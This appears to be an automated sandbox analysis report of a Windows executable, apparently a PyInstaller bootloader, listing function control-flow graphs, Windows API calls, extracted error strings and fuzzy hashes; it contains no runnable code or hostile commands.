                                                                                                                                                                                                                                  control_flow_graph 335 7ff79daf5c74-7ff79daf5ce7 call 7ff79daf59a8 338 7ff79daf5d01-7ff79daf5d0b call 7ff79dae7830 335->338 339 7ff79daf5ce9-7ff79daf5cf2 call 7ff79dae43d4 335->339 344 7ff79daf5d26-7ff79daf5d8f CreateFileW 338->344 345 7ff79daf5d0d-7ff79daf5d24 call 7ff79dae43d4 call 7ff79dae43f4 338->345 346 7ff79daf5cf5-7ff79daf5cfc call 7ff79dae43f4 339->346 348 7ff79daf5d91-7ff79daf5d97 344->348 349 7ff79daf5e0c-7ff79daf5e17 GetFileType 344->349 345->346 362 7ff79daf6042-7ff79daf6062 346->362 352 7ff79daf5dd9-7ff79daf5e07 GetLastError call 7ff79dae4368 348->352 353 7ff79daf5d99-7ff79daf5d9d 348->353 355 7ff79daf5e19-7ff79daf5e54 GetLastError call 7ff79dae4368 CloseHandle 349->355 356 7ff79daf5e6a-7ff79daf5e71 349->356 352->346 353->352 360 7ff79daf5d9f-7ff79daf5dd7 CreateFileW 353->360 355->346 369 7ff79daf5e5a-7ff79daf5e65 call 7ff79dae43f4 355->369 358 7ff79daf5e73-7ff79daf5e77 356->358 359 7ff79daf5e79-7ff79daf5e7c 356->359 366 7ff79daf5e82-7ff79daf5ed7 call 7ff79dae7748 358->366 359->366 367 7ff79daf5e7e 359->367 360->349 360->352 374 7ff79daf5ef6-7ff79daf5f27 call 7ff79daf5728 366->374 375 7ff79daf5ed9-7ff79daf5ee5 call 7ff79daf5bb0 366->375 367->366 369->346 380 7ff79daf5f2d-7ff79daf5f6f 374->380 381 7ff79daf5f29-7ff79daf5f2b 374->381 375->374 382 7ff79daf5ee7 375->382 384 7ff79daf5f91-7ff79daf5f9c 380->384 385 7ff79daf5f71-7ff79daf5f75 380->385 383 7ff79daf5ee9-7ff79daf5ef1 call 7ff79dae9dd0 381->383 382->383 383->362 388 7ff79daf5fa2-7ff79daf5fa6 384->388 389 7ff79daf6040 384->389 385->384 387 7ff79daf5f77-7ff79daf5f8c 385->387 387->384 388->389 391 7ff79daf5fac-7ff79daf5ff1 CloseHandle CreateFileW 388->391 389->362 392 7ff79daf6026-7ff79daf603b 391->392 393 7ff79daf5ff3-7ff79daf6021 GetLastError call 7ff79dae4368 call 7ff79dae7970 391->393 392->389 393->392
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                                                  • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                  • Instruction ID: 1c573a4ccad59b0e8d752d675e9d85510fab41c16ec86165d2422837f678b9cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00C1E432B28A4685EB20DF78C481AAC7775FB59B98B410236DE5E577D4EF38D861C320
                                                                                                                                                                                                                                  Function 00007FF79DAD79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00007FF79DAD7EF9,00007FF79DAD39E6), ref: 00007FF79DAD7A1B
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF79DAD7EF9,00007FF79DAD39E6), ref: 00007FF79DAD7A9E
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,00007FF79DAD7EF9,00007FF79DAD39E6), ref: 00007FF79DAD7ABD
                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00007FF79DAD7EF9,00007FF79DAD39E6), ref: 00007FF79DAD7ACB
                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF79DAD7EF9,00007FF79DAD39E6), ref: 00007FF79DAD7ADC
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,00007FF79DAD7EF9,00007FF79DAD39E6), ref: 00007FF79DAD7AE5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                  • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                  • Instruction ID: ebfe6153d7259def8f33623a0059d3c505844e977949bd0991ea19dbb6bcd56f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40417125A0C94295EA34BB34E4659B9A360FB94754FC00A32D5DE426E4FF3CDE5AC720
                                                                                                                                                                                                                                  Function 00007FF79DAD85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                  • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                  • Instruction ID: 514b4dc0a77c9ec1e42e8f96c8b6783a156fcdf1a80c62a85ef567d6e83c2aa5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7F0C822A1C64186F7709F74B459B66B360EB44778F840339DAAD026D4EF3CD468CB14
                                                                                                                                                                                                                                  Function 00007FF79DAEFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                                                                                                                  • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                                                                                                                                                  • Instruction ID: 0e73f14dd84ff8473f76cd6e46c92b12a71a705601cd601faafc68125efe99c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26029D21A0D68244FA71BB36A401AB9A681EF49B90FD44635DDED473D6FE3CAC21D334
                                                                                                                                                                                                                                  Function 00007FF79DAD18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 179 7ff79dad18f0-7ff79dad192b call 7ff79dad3f70 182 7ff79dad1bc1-7ff79dad1be5 call 7ff79dadb870 179->182 183 7ff79dad1931-7ff79dad1971 call 7ff79dad76a0 179->183 188 7ff79dad1bae-7ff79dad1bb1 call 7ff79dadf36c 183->188 189 7ff79dad1977-7ff79dad1987 call 7ff79dadf9f4 183->189 193 7ff79dad1bb6-7ff79dad1bbe 188->193 194 7ff79dad19a1-7ff79dad19bd call 7ff79dadf6bc 189->194 195 7ff79dad1989-7ff79dad199c call 7ff79dad2760 189->195 193->182 200 7ff79dad19bf-7ff79dad19d2 call 7ff79dad2760 194->200 201 7ff79dad19d7-7ff79dad19ec call 7ff79dae4154 194->201 195->188 200->188 206 7ff79dad1a06-7ff79dad1a87 call 7ff79dad1bf0 * 2 call 7ff79dadf9f4 201->206 207 7ff79dad19ee-7ff79dad1a01 call 7ff79dad2760 201->207 215 7ff79dad1a8c-7ff79dad1a9f call 7ff79dae4170 206->215 207->188 218 7ff79dad1aa1-7ff79dad1ab4 call 7ff79dad2760 215->218 219 7ff79dad1ab9-7ff79dad1ad2 call 7ff79dadf6bc 215->219 218->188 224 7ff79dad1ad4-7ff79dad1ae7 call 7ff79dad2760 219->224 225 7ff79dad1aec-7ff79dad1b08 call 7ff79dadf430 219->225 224->188 230 7ff79dad1b1b-7ff79dad1b29 225->230 231 7ff79dad1b0a-7ff79dad1b16 call 7ff79dad25f0 225->231 230->188 233 7ff79dad1b2f-7ff79dad1b3e 230->233 231->188 235 7ff79dad1b40-7ff79dad1b46 233->235 236 7ff79dad1b60-7ff79dad1b6f 235->236 237 7ff79dad1b48-7ff79dad1b55 235->237 236->236 238 7ff79dad1b71-7ff79dad1b7a 236->238 237->238 239 7ff79dad1b8f 238->239 240 7ff79dad1b7c-7ff79dad1b7f 238->240 242 7ff79dad1b91-7ff79dad1bac 239->242 240->239 241 7ff79dad1b81-7ff79dad1b84 240->241 241->239 243 7ff79dad1b86-7ff79dad1b89 241->243 242->188 242->235 243->239 244 7ff79dad1b8b-7ff79dad1b8d 243->244 244->242
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 677216364-3497178890
                                                                                                                                                                                                                                  • Opcode ID: 466bf8718b008736d5621ee73950a85633fee94eecceccd4235e7da2da383a39
                                                                                                                                                                                                                                  • Instruction ID: 0468959577525e0366e0a3f79b63e24014381689a0a0ab906062aee7e24c13a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 466bf8718b008736d5621ee73950a85633fee94eecceccd4235e7da2da383a39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B71C371A0C68685EB30FB38D461AF9A3A0EB58784F844036D9CD47799FE7CED648720
                                                                                                                                                                                                                                  Function 00007FF79DAD15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 245 7ff79dad15c0-7ff79dad15d1 246 7ff79dad15d3-7ff79dad15dc call 7ff79dad1050 245->246 247 7ff79dad15f7-7ff79dad1611 call 7ff79dad3f70 245->247 252 7ff79dad15ee-7ff79dad15f6 246->252 253 7ff79dad15de-7ff79dad15e9 call 7ff79dad25f0 246->253 254 7ff79dad1613-7ff79dad163a call 7ff79dad2760 247->254 255 7ff79dad163b-7ff79dad1655 call 7ff79dad3f70 247->255 253->252 261 7ff79dad1671-7ff79dad1688 call 7ff79dadf9f4 255->261 262 7ff79dad1657-7ff79dad166c call 7ff79dad25f0 255->262 268 7ff79dad16ab-7ff79dad16af 261->268 269 7ff79dad168a-7ff79dad16a6 call 7ff79dad2760 261->269 267 7ff79dad17c5-7ff79dad17c8 call 7ff79dadf36c 262->267 276 7ff79dad17cd-7ff79dad17df 267->276 272 7ff79dad16b1-7ff79dad16bd call 7ff79dad11f0 268->272 273 7ff79dad16c9-7ff79dad16e9 call 7ff79dae4170 268->273 280 7ff79dad17bd-7ff79dad17c0 call 7ff79dadf36c 269->280 278 7ff79dad16c2-7ff79dad16c4 272->278 281 7ff79dad16eb-7ff79dad1707 call 7ff79dad2760 273->281 282 7ff79dad170c-7ff79dad1717 273->282 278->280 280->267 290 7ff79dad17b3-7ff79dad17b8 281->290 285 7ff79dad17a6-7ff79dad17ae call 7ff79dae415c 282->285 286 7ff79dad171d-7ff79dad1726 282->286 285->290 289 7ff79dad1730-7ff79dad1752 call 7ff79dadf6bc 286->289 294 7ff79dad1754-7ff79dad176c call 7ff79dadfdfc 289->294 295 7ff79dad1785-7ff79dad178c 289->295 290->280 301 7ff79dad1775-7ff79dad1783 294->301 302 7ff79dad176e-7ff79dad1771 294->302 296 7ff79dad1793-7ff79dad179c call 7ff79dad2760 295->296 304 7ff79dad17a1 296->304 301->296 302->289 303 7ff79dad1773 302->303 303->304 304->285
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                  • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                                  • Opcode ID: 3d4ae5c732d2c2ef070b7a7f1a06ad32354e21076cd86e3781a85d2ea0c40103
                                                                                                                                                                                                                                  • Instruction ID: c4c7f7f7c37f1ff9f085e492fa0fac872498197082b2adadad53c21cd27056ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d4ae5c732d2c2ef070b7a7f1a06ad32354e21076cd86e3781a85d2ea0c40103
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB51AD61B0C64382EA30BB35D8619B9A3A0FF54794FC44132ED9C07AA5FF3CE9648760
                                                                                                                                                                                                                                  Function 00007FF79DAD7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                                                                  • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                  • Instruction ID: 37c2dae5aae214d937f0b409d52019356ae3107d04f793779d4ac2ab53dc3a8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6041FD31A0C78281DA30AB34E4556AAB2A1FB89360F900735E6ED477D5EF7CD854CB60
                                                                                                                                                                                                                                  Function 00007FF79DAD11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                  • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                  • Opcode ID: a3629aa16b2bf4226d63d046932eab8e2b7a9c7a4f48f2e716c054c0a2a071a0
                                                                                                                                                                                                                                  • Instruction ID: 20257fec41c42f1d2b9b0422e2f2f4a63ed6aa0bce2d84c834b4f872a8f070d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3629aa16b2bf4226d63d046932eab8e2b7a9c7a4f48f2e716c054c0a2a071a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451F562A0CA8241EA70BB36A460BBAA691FB55794F840135DDCD47BD5FF3CED21C720
                                                                                                                                                                                                                                  Function 00007FF79DAEE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF79DAEE3BA,?,?,-00000018,00007FF79DAEA063,?,?,?,00007FF79DAE9F5A,?,?,?,00007FF79DAE524E), ref: 00007FF79DAEE19C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF79DAEE3BA,?,?,-00000018,00007FF79DAEA063,?,?,?,00007FF79DAE9F5A,?,?,?,00007FF79DAE524E), ref: 00007FF79DAEE1A8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                  • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                  • Instruction ID: 9f594abedf4d7d49d3db1eee2dbfd4bcb9a055782a047097b42d26fbba13e18c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A541E531B1DA0281FA35AB36A800AB5A291FF48B90F884135DE8D87784FE3CE955C334
                                                                                                                                                                                                                                  Function 00007FF79DAD7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF79DAD3834), ref: 00007FF79DAD7CE4
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF79DAD3834), ref: 00007FF79DAD7D2C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7E10: GetEnvironmentVariableW.KERNEL32(00007FF79DAD365F), ref: 00007FF79DAD7E47
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79DAD7E69
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAE7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79DAE7561
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD26C0: MessageBoxW.USER32 ref: 00007FF79DAD2736
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
